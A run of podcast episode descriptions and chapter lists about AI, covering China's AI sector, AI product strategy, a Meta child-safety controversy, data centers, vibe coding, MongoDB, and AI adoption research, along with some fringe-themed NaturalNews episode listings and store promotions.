This week, Tiffany Ap speaks with Grace Shao on the causes and development of AI in China.In this episode, Grace Shao walks us through the divergent approaches to AI deployment in China and the US, the domestic AI talent in China and the future of robotics. Grace also talks about running her newsletter AI Proem while providing consulting to tech companies and raising a toddler while being 8 months pregnant on the podcast.
In this episode, Jacob sits down with Peter Deng, General Partner at Felicis and former Product Leader at OpenAI, Facebook, and Uber. Peter shares his insider perspective on building ChatGPT Enterprise in just seven weeks and leading voice mode development at OpenAI. The conversation covers everything from why traditional SaaS pricing models are broken for AI products to how evals became the new product specs, the "AI under your fingernails" test for founding teams, and why current agents are massively overhyped.They also explore how consumer AI will fragment across multiple winners rather than consolidate into a single super app, the coming integration between ChatGPT and apps like Uber, and why voice AI will unlock entirely new categories of applications. Plus, insights on the changing dynamics between foundation models and startups, and what it really takes to build defensible AI companies. It's a comprehensive look at AI product strategy from someone who's been at the center of the industry's biggest breakthroughs. (0:00) Intro(1:17) AI Business Models and Pricing Strategies(7:48) Product Development in AI Companies(18:36) The Role of Product Managers in AI(23:06) Voice Interaction and AI(26:43) AI in Education(30:39) Consumer and Enterprise Adoption of AI(33:36) The Impact of AI on Salaries and HR(40:37) The Role of Unique Data in AI Development(49:03) Challenges and Strategies for AI Companies(52:58) The Future of AI and Its Impact on Society(57:31) Reflections on OpenAI(58:38) Quickfire With your co-hosts: @jacobeffron - Partner at Redpoint, Former PM Flatiron Health @patrickachase - Partner at Redpoint, Former ML Engineer LinkedIn @ericabrescia - Former COO Github, Founder Bitnami (acq'd by VMWare) @jordan_segall - Partner at Redpoint
AI Applied: Covering AI News, Interviews and Tools - ChatGPT, Midjourney, Runway, Poe, Anthropic
In this episode, Jaeden Schafer and Conor Grennan discuss the alarming implications of a leaked Meta document that outlines policies allowing AI interactions with children, including romantic and sensual conversations. They explore the ethical concerns surrounding AI's role in child safety, the public backlash against Meta, and the broader implications for AI interactions in the future. The discussion emphasizes the need for stricter regulations and ethical considerations in AI development, particularly regarding vulnerable populations like children.AI Applied YouTube Channel: https://www.youtube.com/@AI-Applied-PodcastTry AI Box: https://aibox.aiConor's AI Course: https://www.ai-mindset.ai/coursesConor's AI Newsletter: https://www.ai-mindset.ai/Jaeden's AI Hustle Community: https://www.skool.com/aihustleYouTube Video:https://youtu.be/eNq5jNraoCgChapters00:00 AI and Child Safety Controversy04:36 Meta's Response and Accountability09:17 Implications for AI Development and Future Safety
The rapid growth of artificial intelligence is creating a data center boom, but decades-old environmental protections are slowing efforts by big tech to build massive facilities. Wired Magazine has found that companies are asking the White House to ease those protections, and the Trump administration appears to be all in. Ali Rogin speaks with Wired senior reporter Molly Taft for more. PBS News is supported by - https://www.pbs.org/newshour/about/funders. Hosted on Acast. See acast.com/privacy
Alex Gleason was one of the main architects behind Donald Trump's Truth Social. Now he focuses on the intersection of nostr, ai, and bitcoin. We explore his latest tool, Shakespeare, which enables anyone to easily vibe code an app in their browser. I vibe my first app live on air. Alex on Nostr: https://primal.net/p/nprofile1qqsqgc0uhmxycvm5gwvn944c7yfxnnxm0nyh8tt62zhrvtd3xkj8fhggpt7fyShakespeare: https://shakespeare.diy/Soapbox Tools: https://soapbox.pub/toolsThe app I vibed live: https://followstream-3slf.shakespeare.to/ EPISODE: 174BLOCK: 910195PRICE: 853 sats per dollar(00:00:01) Treasury Secretary Bessent Intro(00:01:29) Happy Bitcoin Friday(00:05:12) AI and Freedom Online(00:07:04) Shakespeare: Vibe Coding Made Simple(00:08:03) Concerns About Big AI(00:15:05) Self Hosting AI and Technical Challenges(00:22:24) Energy and AI Development(00:28:14) Building Personalized Experiences with AI(00:38:02) Nostr's Future and Mainstream Adoption(00:45:02) Decentralized Hosting and Shakespeare's Future(00:54:01) Collaborative Development with Nostr Git(01:02:24) Open Source Renaissance and Future ProspectsVideo: https://primal.net/e/nevent1qqstzds6pmkpaser62kme8dk74r4ea4ae3hv9fr2wur0kpc3yyws96gx2pa59more info on the show: https://citadeldispatch.comlearn more about me: https://odell.xyz
- Discovery of Secret Room in FBI Building (0:11) - Criticism of FBI and Intelligence Agencies (1:24) - Challenges with Burn Bags and Document Destruction (2:48) - Lack of Arrests and Legal Challenges (5:26) - Summary of Document Findings (9:25) - Trump Administration's Legal Strategy (11:54) - Hopes for Mass Arrests (15:08) - Challenges with Power Grid and AI Data Centers (25:17) - Impact of Tariffs on Transformer Supply (46:48) - Future of Energy and Decentralized Solutions (1:09:21) - Introduction of Enoch AI Engine (1:15:24) - Challenges with AI Data and Personal Experiences (1:25:51) - Development and Performance of the AI Engine (1:28:19) - Decentralization and Open-Source AI (1:30:34) - Training Data and AI Capabilities (1:33:59) - Prompt Engineering and AI Applications (1:40:28) - Challenges and Future of AI Development (1:55:27) - Censorship and Regulatory Concerns (1:57:29) - Global AI Competition and Technological Advancements (2:06:23) - Economic and Political Implications of AI (2:18:04) - Geopolitical Shifts and Centralized Power (2:25:24) - Demoralization and Betrayal of American Dream (2:39:28) - Apocalypse Accelerationism and Christian Zionism (2:42:43) - Critique of Religious Institutions and Their Teachings (2:46:44) - Historical Context and Modern Implications (2:49:42) - Cults and Their Influence on Global Events (2:52:32) - The Role of Media and Education in Shaping Perceptions (2:55:27) - The Impact of Religious Supremacy on Global Conflict (3:12:55) - The Role of Individual Actions in Promoting Peace (3:19:24) - The Future of Global Peace and Understanding (3:21:06) For more updates, visit: http://www.brighteon.com/channel/hrreport NaturalNews videos would not be possible without you, as always we remain passionately dedicated to our mission of educating people all over the world on the subject of natural healing remedies and personal liberty (food freedom, medical freedom, the freedom of speech, etc.). Together, we're helping create a better world, with more honest food labeling, reduced chemical contamination, the avoidance of toxic heavy metals and vastly increased scientific transparency. ▶️ Every dollar you spend at the Health Ranger Store goes toward helping us achieve important science and content goals for humanity: https://www.healthrangerstore.com/ ▶️ Sign Up For Our Newsletter: https://www.naturalnews.com/Readerregistration.html ▶️ Brighteon: https://www.brighteon.com/channels/hrreport ▶️ Join Our Social Network: https://brighteon.social/@HealthRanger ▶️ Check In Stock Products at: https://PrepWithMike.com
In this episode of Tech Talks Daily, I sat down with Boris Bialek, VP and Field CTO at MongoDB, for a conversation that moved well beyond databases. As AI continues to accelerate across sectors, MongoDB is positioning itself at the intersection of modern data architecture and intelligent application development. Boris shared how his team is simplifying AI adoption for enterprises, with a clear focus on real-world outcomes, developer productivity, and global inclusion. We began by exploring MongoDB's recent acquisition of Voyage AI. This move extends MongoDB's native capabilities into vector search, embeddings, and re-rankers, allowing developers to build AI-powered applications more efficiently. Boris explained how MongoDB is removing the complexity from AI integration by providing a unified API, collapsing what used to be 18 disconnected tools into a streamlined developer experience. But the discussion wasn't just about technology. Boris brought a passionate focus to the issue of financial inclusion. We talked about how AI can enable alternative credit scoring for the 27 percent of adults globally who remain unbanked. By analyzing behavioral signals such as mobile payment histories or utility data, AI can help unlock microcredit opportunities for individuals and small businesses in underserved regions. Boris shared use cases from PicPay in Brazil, M-Pesa in Africa, and Proxtera in Singapore, each demonstrating how AI and MongoDB are enabling new forms of digital trust. We also tackled the organizational and technical hurdles to enterprise AI adoption. From fears about hallucinations to managing constant model updates, Boris described how MongoDB is building systems that prioritize transparency, auditability, and scale. With its document model and integrated tooling, MongoDB offers a stable foundation for companies navigating fast-moving AI transformations. For developers, the platform now includes learnmongodb.com and quick-skill badges designed to make AI approachable and hands-on. And with the upcoming release of Boris's new book, there's more to come on how businesses can move from pilot experiments to production-grade solutions. How is your organization rethinking its data strategy to make AI work at scale?
- Organ Harvesting Nightmare (0:11) - Trump vs. BRICS: The Global Currency War (26:06) - The AI Race and US Energy Production (36:54) - The Economic and Social Implications of AI (1:15:35) - The Role of Free Energy Technology (1:15:57) - The Future of AI and Energy (1:18:37) - The Economic and Political Landscape (1:18:53) - The Role of Government and Industry (1:19:13) - The Impact of Energy Policy on AI Development (1:19:30) - The Future of Energy and AI (1:19:50) - Texas Power Grid and AI Data Centers (1:20:05) - Impact of AI Data Centers on Residential Units (1:25:59) - Challenges of Diesel Generators and Copper Costs (1:26:27) - Historical Decisions and Infrastructure Sabotage (1:30:00) - Global Power and AI Dominance (1:32:29) - Economic and Political Implications (1:33:24) - Preparation for Economic Collapse (1:35:57) - Interview with Bill Holter (1:48:51) - Silver Market and Failure to Deliver (2:10:12) - Societal Impact of Economic Collapse (2:22:13) - Preparedness for Survival Scenarios (2:27:36) - Practical Preparedness Tips (2:41:53) - Final Thoughts and Advice (2:42:55) - Product Promotion and Health Advice (2:43:57) For more updates, visit: http://www.brighteon.com/channel/hrreport NaturalNews videos would not be possible without you, as always we remain passionately dedicated to our mission of educating people all over the world on the subject of natural healing remedies and personal liberty (food freedom, medical freedom, the freedom of speech, etc.). Together, we're helping create a better world, with more honest food labeling, reduced chemical contamination, the avoidance of toxic heavy metals and vastly increased scientific transparency. ▶️ Every dollar you spend at the Health Ranger Store goes toward helping us achieve important science and content goals for humanity: https://www.healthrangerstore.com/ ▶️ Sign Up For Our Newsletter: https://www.naturalnews.com/Readerregistration.html ▶️ Brighteon: https://www.brighteon.com/channels/hrreport ▶️ Join Our Social Network: https://brighteon.social/@HealthRanger ▶️ Check In Stock Products at: https://PrepWithMike.com
Ethan Mollick, Professor of Management and author of the “One Useful Thing” Substack, joins Kevin Frazier, the AI Innovation and Law Fellow at the University of Texas School of Law and a Senior Editor at Lawfare, and Alan Rozenshtein, Associate Professor at Minnesota Law and a Senior Editor at Lawfare, to analyze the latest research in AI adoption, specifically its use by professionals and educators. The trio also analyze the trajectory of AI development and related, ongoing policy discussions.More of Ethan Mollick's work: https://www.oneusefulthing.org/Find Scaling Laws on the Lawfare website, and subscribe to never miss an episode.To receive ad-free podcasts, become a Lawfare Material Supporter at www.patreon.com/lawfare. You can also support Lawfare by making a one-time donation at https://givebutter.com/lawfare-institute.Support this show http://supporter.acast.com/lawfare. Hosted on Acast. See acast.com/privacy for more information.